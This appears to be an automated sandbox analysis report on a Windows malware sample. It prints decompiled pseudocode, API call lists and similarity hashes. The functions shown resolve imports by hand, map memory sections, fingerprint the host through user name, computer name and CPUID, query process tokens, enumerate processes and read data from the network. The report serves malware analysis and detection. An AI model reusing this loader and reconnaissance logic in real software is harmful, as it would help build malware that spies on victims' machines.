                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?,?), ref: 00401A56
                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401A6C
                            • _snwprintf.NTDLL ref: 00401A91
                            • CreateFileMappingW.KERNELBASE(000000FF,00403188,00000004,00000000,?,?), ref: 00401AB6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?), ref: 00401ACD
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401AE1
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?), ref: 00401AF9
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A), ref: 00401B02
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040126F,0000000A,?), ref: 00401B0A
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                            • String ID:
                            • API String ID: 1724014008-0
                            • Opcode ID: d777c09a78f82427ffff02114adef762b53d280cb3579f302ddc5db8f904bf6f
                            • Instruction ID: 1ca23827cf46cf4e4b48cd91b4d32e6437ca3dc37cb5e0f42cf8925e636595e9
                            • Opcode Fuzzy Hash: d777c09a78f82427ffff02114adef762b53d280cb3579f302ddc5db8f904bf6f
                            • Instruction Fuzzy Hash: 3B21A1B2600204BBDB11AFA8CD88E9F37BDEB48351F11403AF605F61E0D7B45945CB68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D54EC Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 237 6d54ec-6d5500 238 6d550a-6d551c call 6d3b9d 237->238 239 6d5502-6d5507 237->239 242 6d551e-6d552e GetUserNameW 238->242 243 6d5570-6d557d 238->243 239->238 244 6d557f-6d5596 GetComputerNameW 242->244 245 6d5530-6d5540 RtlAllocateHeap 242->245 243->244 246 6d5598-6d55a9 RtlAllocateHeap 244->246 247 6d55d4-6d55f8 244->247 245->244 248 6d5542-6d554f GetUserNameW 245->248 246->247 249 6d55ab-6d55b4 GetComputerNameW 246->249 250 6d555f-6d556e HeapFree 248->250 251 6d5551-6d555d call 6d7194 248->251 252 6d55c5-6d55ce HeapFree 249->252 253 6d55b6-6d55c2 call 6d7194 249->253 250->244 251->250 252->247 253->252
                            C-Code - Quality: 96%
                            			E006D54EC(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x6da310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E006D3B9D( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x6da344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x6da2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E006D7194(_v8 + _v8, _t64);
							}
							HeapFree( *0x6da2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x6da2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E006D7194(_v8 + _v8, _t64);
						}
						HeapFree( *0x6da2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                            0x006d54ec
                            0x006d54f4
                            0x006d54f8
                            0x006d54fb
                            0x006d5500
                            0x006d5502
                            0x006d5507
                            0x006d5507
                            0x006d550d
                            0x006d550f
                            0x006d551c
                            0x006d557d
                            0x006d551e
                            0x006d5523
                            0x006d5529
                            0x006d552e
                            0x006d553c
                            0x006d5540
                            0x006d554f
                            0x006d5556
                            0x006d555d
                            0x006d555d
                            0x006d5568
                            0x006d5568
                            0x006d5540
                            0x006d552e
                            0x006d557f
                            0x006d5585
                            0x006d558f
                            0x006d5591
                            0x006d5596
                            0x006d55a5
                            0x006d55a9
                            0x006d55b4
                            0x006d55bb
                            0x006d55c2
                            0x006d55c2
                            0x006d55ce
                            0x006d55ce
                            0x006d55a9
                            0x006d55d9
                            0x006d55db
                            0x006d55de
                            0x006d55e0
                            0x006d55e3
                            0x006d55e6
                            0x006d55f0
                            0x006d55f4
                            0x006d55f8

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 006D5523
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 006D553A
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 006D5547
                            • HeapFree.KERNEL32(00000000,00000000), ref: 006D5568
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 006D558F
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 006D55A3
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 006D55B0
                            • HeapFree.KERNEL32(00000000,00000000), ref: 006D55CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: HeapName$AllocateComputerFreeUser
                            • String ID:
                            • API String ID: 3239747167-0
                            • Opcode ID: 1435c22340b770d39092f14df54877f1b829c7fa4983ebcc7db0df678d61298f
                            • Instruction ID: a8de1e0426413f2d638a5013d013bab44556102d2c4662327eb34325f008a3cd
                            • Opcode Fuzzy Hash: 1435c22340b770d39092f14df54877f1b829c7fa4983ebcc7db0df678d61298f
                            • Instruction Fuzzy Hash: 8131F871E00605AFDB11DFA9DC81AAAB7FBAF58300F25446AE506D7220EB70DE019B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D737C Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 38%
                            			E006D737C(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E006D7A71(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E006D789E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                            0x006d7389
                            0x006d738a
                            0x006d738b
                            0x006d738c
                            0x006d738d
                            0x006d7391
                            0x006d7398
                            0x006d73a7
                            0x006d73aa
                            0x006d73ad
                            0x006d73b4
                            0x006d73b7
                            0x006d73ba
                            0x006d73bd
                            0x006d73c0
                            0x006d73cb
                            0x006d73cd
                            0x006d73d6
                            0x006d73de
                            0x006d73e0
                            0x006d73f2
                            0x006d73fc
                            0x006d7400
                            0x006d740f
                            0x006d7413
                            0x006d741c
                            0x006d7424
                            0x006d7424
                            0x006d7426
                            0x006d7426
                            0x006d742e
                            0x006d7434
                            0x006d7438
                            0x006d7438
                            0x006d7443

                            APIs
                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 006D73C3
                            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 006D73D6
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 006D73F2
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 006D740F
                            • memcpy.NTDLL(?,00000000,0000001C), ref: 006D741C
                            • NtClose.NTDLL(?), ref: 006D742E
                            • NtClose.NTDLL(00000000), ref: 006D7438
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 2575439697-0
                            • Opcode ID: ebb56f34f2c9fc8cd0128f25f1cbce7e32c208df1dbd3492681a5e575886f6e7
                            • Instruction ID: b46e4f4ff80a4e80b70996f764be1ebf967e0d054d339ab623f957344cd16881
                            • Opcode Fuzzy Hash: ebb56f34f2c9fc8cd0128f25f1cbce7e32c208df1dbd3492681a5e575886f6e7
                            • Instruction Fuzzy Hash: BB211972D00218BBDB119FA5DC85ADEBFBEEF08740F10402AF905E6220E7719B44DBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D4F4B Relevance: 9.1, APIs: 6, Instructions: 124filenetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 359 6d4f4b-6d4f52 360 6d4f5d-6d7643 ResetEvent InternetReadFile 359->360 361 6d4f54-6d4f5b call 6d4e4d 359->361 365 6d7645-6d7653 GetLastError 360->365 366 6d7674-6d7679 360->366 361->360 367 6d4f65-6d4f66 361->367 368 6d766c-6d766e 365->368 369 6d7655-6d7663 call 6d2129 365->369 370 6d773c 366->370 371 6d767f-6d768e 366->371 368->366 373 6d773f-6d7745 368->373 369->373 376 6d7669 369->376 370->373 377 6d7694-6d76a3 call 6d7a71 371->377 378 6d7737-6d773a 371->378 376->368 381 6d7729-6d772b 377->381 382 6d76a9-6d76b1 377->382 378->373 384 6d772c-6d7731 381->384 383 6d76b2-6d76d7 ResetEvent InternetReadFile 382->383 387 6d76d9-6d76e7 GetLastError 383->387 388 6d7700-6d7705 383->388 386 6d7735 384->386 386->373 389 6d76e9-6d76f7 call 6d2129 387->389 390 6d7710-6d771a call 6d789e 387->390 388->390 391 6d7707-6d770e 388->391 389->390 397 6d76f9-6d76fe 389->397 390->384 396 6d771c-6d7720 call 6d45df 390->396 391->383 399 6d7725-6d7727 396->399 397->388 397->390 399->384
                            C-Code - Quality: 71%
                            			E006D4F4B(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				long _t47;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x6da174(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E006D7A71(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E006D2129( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E006D789E(_v16);
										if(_t64 == 0) {
											_t47 = E006D45DF(_v12, _t69); // executed
											_t64 = _t47;
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E006D2129( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E006D4E4D(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}


















                            0x006d4f4b
                            0x006d4f4c
                            0x006d4f52
                            0x006d4f5d
                            0x006d4f5d
                            0x006d4f5f
                            0x006d7625
                            0x006d762a
                            0x006d762c
                            0x006d7643
                            0x006d7674
                            0x006d7679
                            0x006d773c
                            0x006d767f
                            0x006d7686
                            0x006d768e
                            0x006d7739
                            0x006d7694
                            0x006d7699
                            0x006d769e
                            0x006d76a3
                            0x006d772b
                            0x006d76a9
                            0x006d76a9
                            0x006d76ab
                            0x006d76b1
                            0x006d76b2
                            0x006d76b2
                            0x006d76b5
                            0x006d76b8
                            0x006d76be
                            0x006d76cf
                            0x006d76d7
                            0x00000000
                            0x00000000
                            0x006d76df
                            0x006d76e7
                            0x006d76f3
                            0x006d76f7
                            0x006d76f9
                            0x006d76fe
                            0x00000000
                            0x00000000
                            0x006d76fe
                            0x006d76f7
                            0x006d7710
                            0x006d7713
                            0x006d771a
                            0x006d7720
                            0x006d7725
                            0x006d7725
                            0x00000000
                            0x006d7700
                            0x006d7700
                            0x006d7705
                            0x006d7707
                            0x006d7708
                            0x006d770b
                            0x00000000
                            0x006d770b
                            0x00000000
                            0x006d7705
                            0x006d76b2
                            0x006d772c
                            0x006d772c
                            0x006d7732
                            0x006d7732
                            0x006d768e
                            0x006d7645
                            0x006d764b
                            0x006d7653
                            0x006d766c
                            0x006d766e
                            0x00000000
                            0x00000000
                            0x006d7655
                            0x006d765f
                            0x006d7663
                            0x006d7669
                            0x00000000
                            0x006d7669
                            0x006d7663
                            0x006d7653
                            0x006d7745
                            0x006d4f54
                            0x006d4f54
                            0x006d4f5b
                            0x006d4f66
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d4f5b

                            APIs
                            • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,74CF81D0,00000000,00000000), ref: 006D762C
                            • InternetReadFile.WININET(?,?,00000004,?), ref: 006D763B
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?,?), ref: 006D7645
                            • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?), ref: 006D76BE
                            • InternetReadFile.WININET(?,?,00001000,?), ref: 006D76CF
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?,?), ref: 006D76D9
                              • Part of subcall function 006D4E4D: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,74CF81D0,00000000,00000000), ref: 006D4E64
                              • Part of subcall function 006D4E4D: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?), ref: 006D4E74
                              • Part of subcall function 006D4E4D: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 006D4EA6
                              • Part of subcall function 006D4E4D: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 006D4ECB
                              • Part of subcall function 006D4E4D: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 006D4EEB
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                            • String ID:
                            • API String ID: 2393427839-0
                            • Opcode ID: fab5e0f5d04b20f46a22480baddc141c0c6987ff9d213b0384765b89d0c94740
                            • Instruction ID: 8c96399459189e5bd6199bef5d6d8445ebbaf0737c4aa401ef5943f7f622240b
                            • Opcode Fuzzy Hash: fab5e0f5d04b20f46a22480baddc141c0c6987ff9d213b0384765b89d0c94740
                            • Instruction Fuzzy Hash: 9541B436E04604ABCB219BA4DC44AAE77BBAF94360F24496BF511D7390FB30ED419B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D7256 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41processCOMMON
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E006D7256() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x6da348; // 0xdcd5a8
						_t2 = _t9 + 0x6dbea8; // 0x73617661
						_push( &_v264);
						if( *0x6da12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                            0x006d7261
                            0x006d7266
                            0x006d726b
                            0x006d726f
                            0x006d7279
                            0x006d72aa
                            0x006d7280
                            0x006d7285
                            0x006d7292
                            0x006d729b
                            0x006d72b2
                            0x006d729d
                            0x006d72a5
                            0x00000000
                            0x006d72a5
                            0x006d72b3
                            0x006d72b4
                            0x00000000
                            0x006d72b4
                            0x00000000
                            0x006d72ae
                            0x006d72ba
                            0x006d72bf

                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006D7266
                            • Process32First.KERNEL32(00000000,?), ref: 006D7279
                            • Process32Next.KERNEL32(00000000,?), ref: 006D72A5
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 006D72B4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                            • String ID: R}m
                            • API String ID: 3243318325-971717010
                            • Opcode ID: da1246134d2af78201d62dfc2a227f24e1af7955acff893f29fc45b8097beb17
                            • Instruction ID: a1276f4fc03785d88aab022620b9f66cc1913acb53b7c851716fc9627dce416d
                            • Opcode Fuzzy Hash: da1246134d2af78201d62dfc2a227f24e1af7955acff893f29fc45b8097beb17
                            • Instruction Fuzzy Hash: 22F09632E051646BD761A6A69C09DEB776FDFC9350F000067F945C2344F6209B468AB6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401D95 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E00401D95(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401F78(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                            0x00401d9e
                            0x00401da5
                            0x00401da6
                            0x00401da7
                            0x00401da8
                            0x00401da9
                            0x00401dba
                            0x00401dbe
                            0x00401dd2
                            0x00401dd5
                            0x00401dd8
                            0x00401ddf
                            0x00401de2
                            0x00401de9
                            0x00401dec
                            0x00401def
                            0x00401df2
                            0x00401df7
                            0x00401e32
                            0x00401df9
                            0x00401dfc
                            0x00401e02
                            0x00401e07
                            0x00401e0b
                            0x00401e29
                            0x00401e0d
                            0x00401e14
                            0x00401e22
                            0x00401e22
                            0x00401e0b
                            0x00401e3a

                            APIs
                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401DF2
                              • Part of subcall function 00401F78: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00401E07,00000002,00000000,?,?,00000000,?,?,00401E07,00000002), ref: 00401FA5
                            • memset.NTDLL ref: 00401E14
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: Section$CreateViewmemset
                            • String ID: @
                            • API String ID: 2533685722-2766056989
                            • Opcode ID: 8fe031f21ff8d8f0d562623575e9c79972356a6159cf272cee247311ce50a0ce
                            • Instruction ID: 51ff91b96694bad68c08ba82d5134d0fe6a1f199b3c348713c8e4c0aaae189fe
                            • Opcode Fuzzy Hash: 8fe031f21ff8d8f0d562623575e9c79972356a6159cf272cee247311ce50a0ce
                            • Instruction Fuzzy Hash: A8211DB5D00209AFCB11DFA9C8849DFFBB9EF48354F10443AE505F7260D7349A458BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040134F Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0040134F(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x403180;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























